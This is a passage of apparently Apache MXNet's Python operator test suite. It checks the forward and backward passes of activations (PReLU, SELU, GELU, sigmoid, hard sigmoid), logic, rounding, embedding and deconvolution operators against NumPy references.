                # Skip numeric check for float16 type to get rid of flaky behavior
                if dtype is not np.float16:
                    check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
                check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
                check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
@unittest.skip("Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/12885")
def test_prelu():
    """LeakyReLU act_type='prelu' vs numpy, for per-channel (len-4) and
    broadcast (3x4) gamma, 2D and 4D inputs, float16/32/64."""
    def fprelu(x, gamma):
        # Reference forward: x where x > 0, gamma*x elsewhere; for 4D input
        # gamma multiplies along the channel axis via the double transpose.
        pos_indices = x > 0
        out = x.copy()
        if len(x.shape) == 4:
            out = out.transpose(2,3,0,1)
            out = np.multiply(out, gamma)
            out = out.transpose(2,3,0,1)
        else:
            out = np.multiply(out, gamma)
        out[pos_indices] = x[pos_indices]
        return out
    def fprelu_grad(x, y, gamma):
        # Reference gradients wrt x and gamma; the gamma gradient is the
        # sum of the negative-side inputs, reduced over broadcast axes.
        pos_indices = x > 0
        if len(x.shape) == 4:
            grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
            grad_x = grad_x.transpose(2,3,0,1)
        else:
            grad_x = np.multiply(np.ones(x.shape), gamma)
        grad_gam = np.zeros(gamma.shape)
        copy_x = x.copy()
        copy_x[pos_indices] = 0.0
        grad_x[pos_indices] = 1.0
        if len(gamma.shape) > 1 and len(x.shape) != 4:
            grad_gam = copy_x
        elif len(gamma.shape) > 1 and len(x.shape) == 4:
            grad_gam = np.sum(copy_x, axis=(2,3))
        elif gamma.shape[0] == 1:
            grad_gam = np.sum(np.sum(copy_x))
        elif gamma.shape[0] > 1 and len(x.shape) != 4:
            grad_gam = np.sum(copy_x, axis=0)
        elif gamma.shape[0] > 1 and len(x.shape) == 4:
            grad_gam = np.sum(copy_x, axis=(0,2,3))
        return (grad_x, grad_gam)
    x = mx.symbol.Variable("x")
    gamma = mx.symbol.Variable("gamma")
    for shape in [(3,4), (3,4,4,5)]:
        for dtype in [np.float16, np.float32, np.float64]:
            for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
                gam_full = np.array([gam, gam, gam])
                xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
                rtol = 1e-2
                atol = 1e-3
                eps = 1e-4
                # Avoid the gradient discontinuity at the origin.
                xa[abs(xa) < eps] = 1.0
                y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
                ya = fprelu(xa, gam)
                ya_full = fprelu(xa, gam_full)
                g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
                g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
                # Skip numeric check for float16 type to get rid of flaky behavior
                if dtype is not np.float16:
                    check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
                    check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
                check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
                check_symbolic_backward(y, [xa, gam], [np.ones(shape), np.ones(gam.shape)], [g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
                check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
                check_symbolic_backward(y, [xa, gam_full], [np.ones(shape), np.ones(gam_full.shape)],
                                        [g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_selu():
    """LeakyReLU act_type='selu' vs the numpy reference for three dtypes."""
    # Standard SELU constants (Klambauer et al., 2017).
    alpha = 1.6732632423543772848170429916717
    lamb = 1.0507009873554804934193349852946
    def fselu(x):
        neg_indices = x < 0
        out = x.copy()
        out[neg_indices] = alpha * np.expm1(out[neg_indices])
        return out * lamb
    def fselu_grad(grad, x, y):
        neg_indices = x < 0
        out = np.ones(x.shape).astype(x.dtype)
        # d/dx lamb*alpha*(e^x - 1) = lamb*alpha*e^x = y + lamb*alpha, here
        # expressed as (y + alpha) * lamb via the pre-scaled y.
        out[neg_indices] = y[neg_indices] + alpha
        return out * lamb

    shape = (3, 4)
    x = mx.sym.Variable("x")
    y = mx.sym.LeakyReLU(data=x, act_type="selu")
    for dtype in [np.float16, np.float32, np.float64]:
        xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
        # Looser tolerances and smaller inputs for float16 precision.
        eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
        if dtype is np.float16:
            xa /= 10.0
        # Avoid the gradient discontinuity at the origin.
        xa[abs(xa) < eps] = 0.01
        ya = fselu(xa)
        ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
        check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
        check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
        check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_gelu():
    """Test LeakyReLU with act_type='gelu' (tanh approximation) against NumPy.

    GELU(x) ~= 0.5 * x * (1 + tanh(sqrt(2/pi) * (x + 0.044715 * x^3)))
    """
    CUBE_CONSTANT = 0.044715
    ROOT_TWO_OVER_PI = 0.7978845608028654
    def g(x):
        # Inner polynomial of the tanh approximation.
        return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
    def g_grad(x):
        return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
    def f(x):
        return 1.0 + np.tanh(g(x))
    def f_grad(x):
        # Direct derivative of f; kept as reference (unused below).
        return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
    def fgelu(x):
        return 0.5 * x * f(x)
    def fgelu_grad(grad, x, y):
        # d/dx [0.5*x*f(x)] = 0.5*f + 0.5*x*f'. Using f = 1 + tanh(g) and
        # 1 - tanh^2 = (1 + tanh)(1 - tanh), this equals y/x + y*(1-tanh(g))*g'.
        return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
    shape = (3, 4)
    x = mx.sym.Variable("x")
    y = mx.sym.LeakyReLU(data=x, act_type="gelu")
    for dtype in [np.float16, np.float32, np.float64]:
        xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
        # Looser tolerances for float16.
        eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
        if dtype is np.float16:
            xa /= 10.0
        # Move inputs away from 0: fgelu_grad divides by x.
        xa[abs(xa) < eps] = 0.01
        ya = fgelu(xa)
        ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
        check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
        check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
        check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_sigmoid():
    """Check mx.sym.sigmoid forward/backward against a NumPy reference."""
    def np_sigmoid(vals):
        return 1.0 / (1.0 + np.exp(-vals))
    dims = (3, 4)
    inp = mx.symbol.Variable("x")
    sym = mx.sym.sigmoid(inp)
    data = np.random.uniform(low=-1.0, high=1.0, size=dims)
    expected = np_sigmoid(data)
    check_numeric_gradient(sym, [data], numeric_eps=1E-3)
    check_symbolic_forward(sym, [data], [expected])
    # d/dx sigmoid(x) = sigmoid(x) * (1 - sigmoid(x))
    check_symbolic_backward(sym, [data], [np.ones(dims)], [expected * (1 - expected)])
@with_seed()
def test_shape_array():
    """shape_array must return the input's shape and propagate zero gradient."""
    for ndim in range(1, 6):
        dims = rand_shape_nd(ndim)
        var = mx.sym.var('x')
        sym = mx.sym.shape_array(var)
        in_arr = mx.nd.array(np.random.ranf(dims))
        in_grad = mx.nd.empty(in_arr.shape)
        expected = np.shape(in_arr)
        out_grad = mx.nd.ones(expected)
        executor = sym.bind(ctx=default_context(), args={'x': in_arr},
                            args_grad={'x': in_grad})
        executor.forward(is_train=True)
        executor.backward([out_grad])
        result = executor.outputs[0].asnumpy()
        same(result, expected)
        # shape_array is not differentiable w.r.t. its input: gradient is all zeros.
        assert_almost_equal(in_grad.asnumpy(), np.zeros_like(in_grad.asnumpy()))
@with_seed()
def test_size_array():
    """size_array must return the element count and propagate zero gradient."""
    for ndim in range(1, 6):
        dims = rand_shape_nd(ndim)
        var = mx.sym.var('x')
        sym = mx.sym.size_array(var)
        in_arr = mx.nd.array(np.random.ranf(dims))
        in_grad = mx.nd.empty(in_arr.shape)
        expected = np.size(in_arr)
        out_grad = mx.nd.ones(expected)
        executor = sym.bind(ctx=default_context(), args={'x': in_arr},
                            args_grad={'x': in_grad})
        executor.forward(is_train=True)
        executor.backward([out_grad])
        result = executor.outputs[0].asnumpy()
        same(result, expected)
        # size_array is not differentiable w.r.t. its input: gradient is all zeros.
        assert_almost_equal(in_grad.asnumpy(), np.zeros_like(in_grad.asnumpy()))
@with_seed()
def test_hard_sigmoid():
    """Test mx.sym.hard_sigmoid against a NumPy reference.

    hard_sigmoid(x) = clip(alpha*x + beta, 0, 1) with alpha=0.2, beta=0.5.
    """
    def fhardsigmoid(a, alpha=0.2, beta=0.5):
        # Reference forward: linear ramp clipped to [0, 1].
        return np.maximum(np.zeros(a.shape, dtype=a.dtype),
                          np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
    def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
        # Gradient is alpha on the ramp and 0 in the saturated regions.
        orig_out = fhardsigmoid(a, alpha, beta)
        res = out_grad * alpha
        res[orig_out <= 0.0] = 0.0
        res[orig_out >= 1.0] = 0.0
        return res
    shape = (3, 4)
    x = mx.symbol.Variable("x")
    y = mx.sym.hard_sigmoid(x)
    for dtype in [np.float16, np.float32, np.float64]:
        # Looser relative tolerance for float16.
        if dtype is np.float16:
            rtol = 1e-2
        else:
            rtol = 1e-3
        atol = 1e-3
        eps = 1e-3
        xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
        # function not differentiable at x=2.5 and -2.5
        xa[abs(xa-2.5) < eps] -= 2 * eps
        xa[abs(xa+2.5) < eps] += 2 * eps
        ya = fhardsigmoid(xa)
        grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
        # Skip the noisy numeric gradient for float16.
        if dtype is not np.float16:
            check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
        check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
        check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_softsign():
    """Verify softsign forward and backward against NumPy references."""
    dims = (3, 4)
    sym_x = mx.symbol.Variable("x")
    sym_out = mx.sym.softsign(sym_x)
    data = np.random.uniform(low=-1.0, high=1.0, size=dims)
    denom = 1.0 + np.abs(data)
    expected = data / denom
    # d/dx softsign(x) = 1 / (1 + |x|)^2
    expected_grad = 1.0 / (denom * denom)
    check_numeric_gradient(sym_out, [data], numeric_eps=1E-3)
    check_symbolic_forward(sym_out, [data], [expected])
    check_symbolic_backward(sym_out, [data], [np.ones(dims)], [expected_grad])
@with_seed()
def test_binary_logic():
    """Test elementwise comparison operators: ==, >, >=, <, <=, !=.

    Covers the operator-overload (non-broadcasting) forms, including a scalar
    on either side, plus the explicit broadcast_* symbols with broadcasting
    input shapes.
    """
    def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
        # forward_gt: NumPy ground truth; logic_sym: builds the mxnet symbol.
        x = mx.symbol.Variable("x")
        y = mx.symbol.Variable("y")
        z = logic_sym(x, y)
        x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
        y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
        exe = z.simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
        mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0].asnumpy()
        assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
        # Backward is run for crash-safety only; no gradient values are checked.
        exe.backward()
        if test_scalar:
            # Same operator with a scalar on the left and on the right.
            z_lscalar = logic_sym(1, y)
            z_rscalar = logic_sym(x, 1)
            exe_lscalar = z_lscalar.simple_bind(ctx=default_context(), y=y_shape)
            exe_rscalar = z_rscalar.simple_bind(ctx=default_context(), x=x_shape)
            mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0].asnumpy()
            mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0].asnumpy()
            assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
            assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
            exe_lscalar.backward()
            exe_rscalar.backward()
    # Test the no-broadcasting binary logic ops + scalar logic ops
    _inner_test(forward_gt=lambda x, y: x == y,
                logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
    _inner_test(forward_gt=lambda x, y: x > y,
                logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
    _inner_test(forward_gt=lambda x, y: x >= y,
                logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
    _inner_test(forward_gt=lambda x, y: x < y,
                logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
    _inner_test(forward_gt=lambda x, y: x <= y,
                logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
    _inner_test(forward_gt=lambda x, y: x != y,
                logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
    # Test the broadcasting binary logic ops
    _inner_test(forward_gt=lambda x, y: x == y,
                logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
                x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
    _inner_test(forward_gt=lambda x, y: x > y,
                logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
                x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
    _inner_test(forward_gt=lambda x, y: x >= y,
                logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
                x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
    _inner_test(forward_gt=lambda x, y: x < y,
                logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
                x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
    _inner_test(forward_gt=lambda x, y: x <= y,
                logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
                x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
    _inner_test(forward_gt=lambda x, y: x != y,
                logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
                x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
@with_seed()
def test_unary_logic():
    """logical_not via both the imperative ndarray and the symbolic API."""
    def expected_not(arr, dtype):
        return np.logical_not(arr).astype(dtype)
    dims = (3, 4)
    data = np.random.randint(-2, 2, size=dims).astype(np.float32)
    nd_data = mx.nd.array(data)
    # imperative path
    nd_result = mx.nd.logical_not(nd_data)
    assert_almost_equal(nd_result.asnumpy(), expected_not(data, dtype=data.dtype))
    # symbolic path
    var = mx.sym.Variable('x')
    sym = mx.sym.logical_not(data=var)
    executor = sym.simple_bind(ctx=default_context(), x=dims)
    sym_result = executor.forward(is_train=True, x=nd_data)[0]
    assert_almost_equal(sym_result.asnumpy(), expected_not(data, dtype=data.dtype))
@with_seed()
def test_embedding():
    """Test Embedding forward/backward against a one-hot matmul reference."""
    in_dim = 10
    out_dim = 4
    batch = 24
    data = mx.sym.Variable("data")
    embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
    # No gradient for the integer indices; only the weight receives one.
    exe_test = embed.simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
    arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
    grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
    np_data = np.random.randint(low=0, high=in_dim, size=batch)
    np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
    # Embedding lookup is equivalent to one_hot(data) @ weight.
    np_onehot = np.zeros((batch, in_dim))
    np_onehot[np.arange(batch), np_data] = 1.0
    # forward
    arg_map["data"][:] = np_data
    arg_map["embed_weight"][:] = np_weight
    exe_test.forward(is_train=True)
    # Non-zero atol required, as exposed by seed 781663739
    rtol = 1e-5
    atol = 1e-5
    assert_almost_equal(exe_test.outputs[0].asnumpy(), np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
    # backward
    np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
    grad = mx.nd.zeros(np_grad.shape)
    grad[:] = np_grad
    exe_test.backward([grad])
    # Weight gradient scatters each row's out-grad back to its index: one_hot.T @ grad.
    assert_almost_equal(grad_map["embed_weight"].asnumpy(), np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
@with_seed()
def test_binary_op_duplicate_input():
    """Gradient must accumulate correctly when both operands are the same symbol."""
    var = mx.symbol.Variable('data')
    dims = (3, 4)
    ref = np.full(dims, 5.0)
    nd_in = mx.nd.array(ref)
    nd_grad = mx.nd.empty(dims)
    nd_grad[:] = 3
    head_grad = mx.nd.empty(dims)
    head_grad[:] = 1
    squared = var * var
    executor = squared.bind(default_context(), args=[nd_in], args_grad=[nd_grad])
    executor.forward(is_train=True)
    assert_almost_equal(executor.outputs[0].asnumpy(), ref * ref)
    executor.backward(head_grad)
    # d(x*x)/dx = 2x: the two incoming gradient paths must add up.
    assert_almost_equal(nd_grad.asnumpy(), 2.0 * ref)
@with_seed()
def test_sign():
    """Check mx.sym.sign: forward matches np.sign and the input gradient is zero.

    sign() is piecewise constant, so its derivative is 0 everywhere the input
    is non-zero (the input here is the constant 5, so no discontinuity is hit).
    """
    data = mx.symbol.Variable('data')
    shape = (3, 4)
    data_tmp = np.full(shape, 5.0)
    arr_data = mx.nd.array(data_tmp)
    arr_grad = mx.nd.empty(shape)
    arr_grad[:] = 3
    test = mx.sym.sign(data)
    exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
    exe_test.forward(is_train=True)
    assert_almost_equal(exe_test.outputs[0].asnumpy(), np.sign(data_tmp))
    # Backward with a non-trivial upstream gradient; the result must still be 0.
    out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
    exe_test.backward(out_grad)
    assert_almost_equal(arr_grad.asnumpy(), np.zeros(shape))
@with_seed()
def test_round_ceil_floor():
    """Forward check of round + ceil + floor on a constant 5.543 array."""
    var = mx.symbol.Variable('data')
    dims = (3, 4)
    ref = np.full(dims, 5.543)
    nd_in = mx.nd.array(ref)
    nd_grad = mx.nd.empty(dims)
    nd_grad[:] = 2
    combined = mx.sym.round(var) + mx.sym.ceil(var) + mx.sym.floor(var)
    executor = combined.bind(default_context(), args=[nd_in])
    executor.forward(is_train=True)
    result = executor.outputs[0].asnumpy()
    expected = np.round(ref) + np.ceil(ref) + np.floor(ref)
    assert_almost_equal(result, expected)
@with_seed()
def test_trunc():
    """Forward check of trunc, with float32 precision matched to mxnet."""
    ref = np.random.rand(3, 4) * 10 - 5
    nd_in = mx.nd.array(ref)
    var = mx.symbol.Variable('data')
    sym = mx.sym.trunc(var)
    executor = sym.bind(default_context(), args=[nd_in])
    executor.forward(is_train=True)
    result = executor.outputs[0].asnumpy()
    # 'trunc' is sensitive to calculation precision: cast the reference to
    # float32 so borderline values truncate the same way as mxnet's float32
    # computation (repro issue with seed 1660190454).
    expected = np.trunc(np.float32(ref))
    assert_almost_equal(result, expected)
@with_seed()
def test_rsqrt_cos_sin():
    """Test forward/backward of the composite rsqrt(x) + cos(x) + sin(x)."""
    data = mx.symbol.Variable('data')
    shape = (3, 4)
    data_tmp = np.ones(shape)
    data_tmp[:]=5
    arr_data = mx.nd.array(data_tmp)
    arr_grad = mx.nd.empty(shape)
    arr_grad[:]=3
    test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
    exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
    exe_test.forward(is_train=True)
    out = exe_test.outputs[0].asnumpy()
    npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
    assert_almost_equal(out, npout)
    out_grad = mx.nd.empty(shape)
    out_grad[:] = 2;
    npout_grad = out_grad.asnumpy()
    # d/dx x^(-1/2) = -1/(2*x^(3/2)), d/dx cos = -sin, d/dx sin = cos;
    # each term is scaled by the upstream gradient (2).
    npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
    exe_test.backward(out_grad)
    assert_almost_equal(arr_grad.asnumpy(), npout_grad)
@with_seed()
def test_maximum_minimum():
    """Test elementwise maximum + minimum forward/backward.

    Inputs are the constants 2 and 3, so the winner of each op is fixed and
    the gradient routing (to whichever operand was selected) is deterministic.
    """
    data1 = mx.symbol.Variable('data1')
    data2 = mx.symbol.Variable('data2')
    shape = (3, 4)
    data_tmp1 = np.random.rand(3,4)
    data_tmp2 = np.random.rand(3,4)
    data_tmp1[:] = 2
    data_tmp2[:] = 3
    arr_data1 = mx.nd.array(data_tmp1)
    arr_data2 = mx.nd.array(data_tmp2)
    arr_grad1 = mx.nd.empty(shape)
    arr_grad2 = mx.nd.empty(shape)
    test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
    exe_test = test.bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
    exe_test.forward(is_train=True)
    out = exe_test.outputs[0].asnumpy()
    npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
    assert_almost_equal(out, npout)
    out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
    exe_test.backward(out_grad)
    npout_grad = np.ones(shape)
    npout_grad[:] = 2
    # maximum routes its gradient to data1 where data1 > data2 (mask1);
    # minimum routes its gradient to data1 where data1 < data2 (mask2).
    mask1 = (data_tmp1 > data_tmp2).astype('float')
    mask2 = (data_tmp1 < data_tmp2).astype('float')
    npout_grad1 = npout_grad * mask1 + npout_grad * mask2
    # data2 receives the complement of each mask.
    npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
    assert_almost_equal(arr_grad1.asnumpy(), npout_grad1)
    assert_almost_equal(arr_grad2.asnumpy(), npout_grad2)
@with_seed()
def test_maximum_minimum_scalar():
    """Test maximum/minimum with a scalar operand on either side.

    The input is the constant 2, so for each term the comparison outcome —
    and hence the gradient routing — is fixed.
    """
    data1 = mx.symbol.Variable('data')
    shape = (3, 4)
    data_tmp1 = np.random.rand(3,4)
    data_tmp1[:] = 2
    arr_data1 = mx.nd.array(data_tmp1)
    arr_grad1 = mx.nd.empty(shape)
    test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
    exe_test = test.bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
    exe_test.forward(is_train=True)
    out = exe_test.outputs[0].asnumpy()
    npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
    assert_almost_equal(out, npout)
    out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
    exe_test.backward(out_grad)
    npout_grad = np.ones(shape)
    npout_grad[:] = 2
    # Per-term masks: data receives the gradient only where it "wins".
    mask1 = (data_tmp1 > 3).astype('float')   # maximum(data, 3): data wins if > 3
    mask2 = (9 > data_tmp1).astype('float')   # maximum(9, data): scalar wins if 9 > data
    mask3 = (5 < data_tmp1).astype('float')   # minimum(5, data): scalar wins if 5 < data
    mask4 = (data_tmp1 < 4).astype('float')   # minimum(data, 4): data wins if < 4
    npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
    assert_almost_equal(arr_grad1.asnumpy(), npout_grad1)
@with_seed()
def test_abs():
    """abs forward and backward: |x|, gradient sign(x) * upstream gradient."""
    var = mx.symbol.Variable('data')
    dims = (3, 4)
    ref = np.full(dims, 5.0)
    nd_in = mx.nd.array(ref)
    nd_grad = mx.nd.empty(dims)
    nd_grad[:] = 3
    sym = mx.sym.abs(var)
    executor = sym.bind(default_context(), args=[nd_in], args_grad=[nd_grad])
    executor.forward(is_train=True)
    assert_almost_equal(executor.outputs[0].asnumpy(), abs(ref))
    head_grad = mx.nd.empty(dims)
    head_grad[:] = 2
    # d|x|/dx = sign(x) away from 0.
    expected_grad = head_grad.asnumpy() * np.sign(ref)
    executor.backward(head_grad)
    assert_almost_equal(nd_grad.asnumpy(), expected_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
    """Configuration A: input --> conv --> deconv --> output.

    The convolution and deconvolution share parameters (and the same weight
    tensor), which keeps the output shape equal to the input shape. Since
    deconvolution's backward pass is convolution's forward pass, feeding the
    same tensor to forward() and as the out-grad of backward() should produce
    (approximately) the same values. Also verifies grad_req='add' accumulates
    onto pre-existing gradient contents.
    """
    assert input_shape[1] == num_filter
    data = mx.sym.Variable(name="data")
    conv = mx.sym.Convolution(
        data=data, kernel=kernel, stride=stride, pad=pad,
        num_filter=num_filter, no_bias = "true", name = "conv")
    deconv = mx.sym.Deconvolution(
        data=conv, kernel=kernel, stride=stride, pad=pad,
        num_filter=num_filter, no_bias = "true", name = "deconv")
    arg_names = deconv.list_arguments()
    arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
    input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
    # Reuse the input as the out-grad (see docstring).
    out_grad = input_data
    args = {}
    args["data"] = input_data
    # Tie conv and deconv to the identical weight tensor.
    args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
        (num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
    args_grad = [mx.nd.empty(s) for s in arg_shapes]
    exe = deconv.bind(default_context(), args=args, args_grad=args_grad)
    exe.forward(is_train=True)
    out = exe.outputs[0].asnumpy()
    exe.backward(out_grad)
    assert_almost_equal(out, args_grad[0].asnumpy(), rtol=1E-3, atol=1e-3)
    # Repeat with grad_req='add': the data gradient must be out + prior contents.
    args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
    args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
    exe = deconv.bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
    exe.forward(is_train=True)
    out = exe.outputs[0].asnumpy()
    exe.backward(out_grad)
    assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
    """Configuration A: input --> conv --> output.
    Configuration B: input --> deconv --> output.

    conv and deconv use matching parameters chosen so the output shape equals
    the input shape (stride 1, kernel = 2*pad + 1). If A's input equals B's
    out-grad and A's out-grad equals B's input, the weight gradients of the
    two configurations must match. Also checks grad_req='add' accumulation on
    the deconv weight gradient.
    """
    ndim = len(pad)
    stride = (1,) * ndim
    # kernel = 2*pad + 1 keeps output shape == input shape at stride 1.
    kernel = tuple(2 * np.array(pad) + 1)
    data_conv = mx.sym.Variable(name="data_conv")
    conv = mx.sym.Convolution(
        data=data_conv, kernel=kernel, stride=stride, pad=pad,
        num_filter=num_filter, no_bias = "true", name = "conv")
    data_deconv = mx.sym.Variable(name="data_deconv")
    deconv = mx.sym.Deconvolution(
        data=data_deconv, kernel=kernel, stride=stride, pad=pad,
        num_filter=num_filter, no_bias = "true", name = "deconv")
    conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
    conv_args = {}
    conv_args["data_conv"] = conv_data
    conv_args['conv_weight'] = \
        mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
    conv_args_grad = [mx.nd.zeros(conv_data.shape),
                      mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
    exe_conv = conv.bind(default_context(), args=conv_args, args_grad=conv_args_grad)
    exe_conv.forward(is_train=True)
    conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
    exe_conv.backward(conv_out_grad)
    # Configuration B: swap roles — conv's out-grad becomes deconv's input,
    # conv's input becomes deconv's out-grad; weights are shared.
    deconv_data = conv_out_grad
    deconv_args = {}
    deconv_args['data_deconv'] = deconv_data
    deconv_args['deconv_weight'] = conv_args['conv_weight']
    deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
                        mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
    deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
                                  np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
    deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
                              mx.nd.array(deconv_addto_args_grad_npy[1])]
    exe_deconv = deconv.bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
    exe_deconv.forward(is_train=True)
    deconv_out_grad = conv_data[:]
    exe_deconv.backward(deconv_out_grad)
